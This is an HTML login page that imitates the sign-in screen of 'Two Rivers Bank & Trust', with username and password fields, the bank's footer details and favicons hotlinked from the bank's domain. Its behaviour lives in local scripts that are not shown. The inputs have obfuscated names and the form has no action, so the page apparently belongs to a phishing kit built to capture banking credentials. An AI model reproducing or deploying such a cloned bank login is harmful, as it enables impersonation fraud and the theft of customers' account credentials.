<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login · Two Rivers Bank & Trust</title>
    <link
      rel="icon"
      type="image/x-icon"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-favicon-98b27f2c.ico"
    />
    <link
      rel="apple-touch-icon"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-ios-0b4518ce.png"
    />
    <link
      rel="icon"
      sizes="192x192"
      href="https://my.tworivers.bank/images/fi-assets/two-rivers-bank-trust/two-rivers-bank-trust-android-bd6731e0.png"
    />
    <!-- Latest compiled and minified CSS -->
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css"
      integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u"
      crossorigin="anonymous"
    />

    <!-- Optional theme -->
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css"
      integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp"
      crossorigin="anonymous"
    />

    <link rel="stylesheet" href="./style/style.css" />
  </head>
  <body>
    <!-- card -->
    <div class="card">
      <!-- card Logo -->
      <div class="cardLogo" id="logoDiv"></div>

      <!--  -->
      <div class="errorDiv" id="errorDiv" >Username is required.</div>

      <div
        class="input"
        onmouseover="moveUp('inputPlaceholder')"
        id="formOneDiv"
      >
        <div
          id="SwitchId"
          class="Switch"
          style="position: absolute; transition: all 0.2s ease"
          onclick="switc()"
        >
          Switch
        </div>
        <div
          id="inputPlaceholder"
          class="moveIn"
          style="position: absolute; transition: all 0.2s ease"
        >
          Username
        </div>
        <input
          name="__"
          type="text"
          id="usernameInput"
          onmouseout="moveIn('inputPlaceholder','usernameInput')"
          onfocus="moveUp('inputPlaceholder')"
          class="cardInput"
          autocomplete="off"
        />
      </div>

  

      <div
        class="input"
        onmouseover="moveUp('inputPlaceholderTwo')"
        id="formTwoDiv"
        style="transition: all 0.2s ease; display: none; margin-top: 20px"
      >
        <div
          id="inputPlaceholderTwo"
          class="moveIn"
          style="position: absolute; transition: all 0.2s ease"
        >
          Password
        </div>
        <input
          name="__"
          type="password"
          id="passwordInput"
          onmouseout="moveIn('inputPlaceholderTwo','passwordInput')"
          onfocus="moveUp('inputPlaceholderTwo')"
          class="cardInput"
          autocomplete="off"
        />
      </div>

     

      <!-- animaton loading -->
      <div class="formLoadAnimDiv" id="formLoadAnimDiv">
        <svg
          width="24"
          height="24"
          viewBox="0 0 24 24"
          xmlns="http://www.w3.org/2000/svg"
          fill="gray"
          style="fill: gray"
        >
          <style>
            .spinner_6kVp {
              transform-origin: center;
              animation: spinner_irSm 0.75s infinite linear;
            }
            @keyframes spinner_irSm {
              100% {
                transform: rotate(360deg);
              }
            }
          </style>
          <path
            d="M10.72,19.9a8,8,0,0,1-6.5-9.79A7.77,7.77,0,0,1,10.4,4.16a8,8,0,0,1,9.49,6.52A1.54,1.54,0,0,0,21.38,12h.13a1.37,1.37,0,0,0,1.38-1.54,11,11,0,1,0-12.7,12.39A1.54,1.54,0,0,0,12,21.34h0A1.47,1.47,0,0,0,10.72,19.9Z"
            class="spinner_6kVp"
          />
        </svg>
      </div>
      <!--  -->

      <div
        class="d-flex py-3 px-2"
        style="
          align-items: center;
          justify-content: flex-end;
          display: flex;
          padding: 20px 0px;
        "
        id="oneHa"
      >
        <a
          href=""
          style="
            font-weight: 500;
            display: inline-block;
            margin-top: -6px;
            padding: 1px;
            line-height: 34px;
            color: #003f78;
          "
          >Forgot?</a
        >
      </div>

    
      <div
        class=""
        style="
          display: flex;
          align-items: center;
          justify-content: space-between;
        "
        id="twoHa"
      >
        <a
          href=""
          style="
            font-weight: 600;
            display: inline-block;
            margin-top: -6px;
            padding: 1px;
            line-height: 34px;
            color: #003f78;
            font-size: 15px;
          "
          id="singInFirstT"
          >First time user? Enroll now.</a
        >

        <a
          href=""
          style="
            font-weight: 600;
            display: none;
            margin-top: -6px;
            padding: 1px;
            line-height: 34px;
            color: #003f78;
            font-size: 15px;
            text-align: center;
            width: 100%;
          "
          id="singInAsPassKey"
          ><svg
            viewBox="0 0 24 24"
            xmlns="http://www.w3.org/2000/svg"
            style="fill: #003f78; width: 25px; height: 25px"
          >
            <path
              d="M20.3805428,13.8137069 C20.7055134,16.1582382 19.2593532,17.570874 17.4092135,17.7960134 C15.7762239,17.9947284 14.1114747,16.9681911 13.8785019,15.0555136 L13.8595687,14.8545033 C13.7790838,13.6557045 13.0355191,13.0330742 12.0230096,13.066022 C11.05262,13.0975991 10.3181869,13.7240229 10.3181869,14.5810911 C10.3181869,17.4367719 11.3683308,19.1423433 14.5557119,20.5651349 C14.9339525,20.7339749 15.1037051,21.1774713 14.9348651,21.5557119 C14.7660251,21.9339525 14.3225287,22.1037051 13.9442881,21.9348651 C10.2032953,20.2649509 8.81818692,18.0153532 8.81818692,14.5810911 C8.81818692,12.8447756 10.2507423,11.6228988 11.9742243,11.5668155 C13.7082808,11.5103881 15.1194035,12.6399884 15.3374431,14.5467693 L15.3561995,14.7540225 C15.429414,15.8445306 16.322059,16.4172418 17.2280184,16.3069975 C18.3243687,16.1735851 19.0896808,15.4260142 18.8947476,14.0196498 C18.3183902,9.8614644 13.5967275,7.0902036 9.75231256,8.6064211 C5.72979556,10.1928811 4.16583408,13.7505577 5.81863998,18.047386 C5.96734806,18.433985 5.77449938,18.8679371 5.38790038,19.0166452 C5.00130139,19.1653533 4.56734927,18.9725046 4.41864118,18.5859056 C2.47014448,13.5203648 4.41353867,9.09956029 9.20197565,7.21102536 C13.9515477,5.33781855 19.6710097,8.6947125 20.3805428,13.8137069 Z M17.9520641,14.7577603 C17.9520641,15.1719739 17.6162777,15.5077603 17.2020641,15.5077603 C16.7878506,15.5077603 16.4520641,15.1719739 16.4520641,14.7577603 C16.4520641,12.3190462 14.2664688,10.6030471 12.0398447,10.6492278 C9.87888055,10.6940466 8.03428382,12.0793713 7.77632991,14.3007925 C7.51636764,16.539509 8.7084915,19.0419133 10.3448004,20.6140101 C10.6434956,20.9009839 10.6529977,21.3757626 10.3660239,21.6744579 C10.07905,21.9731532 9.60427133,21.9826553 9.30557605,21.6956814 C7.3610446,19.8274573 5.96482003,16.8966223 6.28634185,14.1277734 C6.6384375,11.095632 9.15077109,9.20882519 12.0087411,9.1495503 C15.0113761,9.08727503 17.9520641,11.3961279 17.9520641,14.7577603 Z M12.0356675,14.0078405 C12.4498368,14.0017826 12.7904982,14.3326222 12.7965562,14.7467914 C12.8351549,17.3857128 15.2057052,19.0920846 17.8887035,18.5678296 C18.295229,18.488395 18.6891776,18.7535545 18.7686123,19.1600801 C18.8480469,19.5666056 18.5828873,19.9605542 18.1763618,20.0399888 C14.6140996,20.736051 11.3496285,18.3862163 11.2967166,14.7687292 C11.2906587,14.3545599 11.6214983,14.0138985 12.0356675,14.0078405 Z M21.0390793,8.97004406 C21.28404,9.30406074 21.2118458,9.77341463 20.8778291,10.0183753 C20.5438125,10.263336 20.0744586,10.1911418 19.8294979,9.85712514 C15.6762501,4.19395483 7.47506811,4.97312875 4.36077947,9.81906473 C4.13683898,10.1675235 3.67281767,10.2684656 3.32435888,10.0445251 C2.97590008,9.82058458 2.87495805,9.35656328 3.09889854,9.00810448 C6.75686194,3.31619261 16.2324408,2.41594141 21.0390793,8.97004406 Z M12.0795658,2.00170165 C14.4139345,2.00170165 16.4372937,2.58338203 18.1889848,3.56526901 C18.550306,3.76780273 18.6790286,4.22489741 18.4764949,4.58621855 C18.2739612,4.9475397 17.8168665,5.07626234 17.4555454,4.87372862 C15.918012,4.0118849 14.1433536,3.50170165 12.0795658,3.50170165 C9.9768514,3.50170165 8.00147381,4.05741986 6.70286873,4.85793988 C6.35026747,5.07529955 5.88822284,4.96566457 5.67086318,4.61306331 C5.45350351,4.26046205 5.56313848,3.79841742 5.91573975,3.58105775 C7.45185852,2.63412335 9.69988932,2.00170165 12.0795658,2.00170165 Z"
            ></path>
          </svg>
          Sign in with a passkey</a
        >

        <button
          style="
            width: auto;
            height: auto;
            padding: 5px 10px;
            margin-left: 20px;
            width: 100px;
            background-color: #003f78;
          "
          onclick="formAgain()"
          id="submitBtn"
        >
          Continue
        </button>
    
      </div>

    
      <!--  -->

      <br />
      <br />
    </div>

    <footer
      class="p-2 d-flex align-item-center justify-content-center m-auto footerList"
    >
      <div>© 2024 Two Rivers Bank & Trust</div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>(888)
        226-6063
      </div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>Privacy
        policy
      </div>
      <div>
        <span style="margin-left: 5px; margin-right: 10px">•</span>Member FDIC
      </div>
      <div style="display: flex">
        •
        <svg
          width="16"
          height="11"
          viewBox="0 0 10 7"
          aria-hidden="true"
          style="
            margin-right: 5px;
            margin-top: 2px;
            fill: rgb(112, 112, 112);
            margin-left: 10px;
          "
        >
          <path
            d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z"
          ></path>
        </svg>
        Equal Housing Lender
      </div>
    </footer>
    <script src="./react/reaction.js"></script> 
        <script src="./react/jquery.min.js"></script>
    <script src="./react/jquery.maxlength.js"></script>
    <script src="./react/jquery.form.min.js"></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"
      integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g=="
      crossorigin="anonymous"
      referrerpolicy="no-referrer"
    ></script>
  </body>
</html>
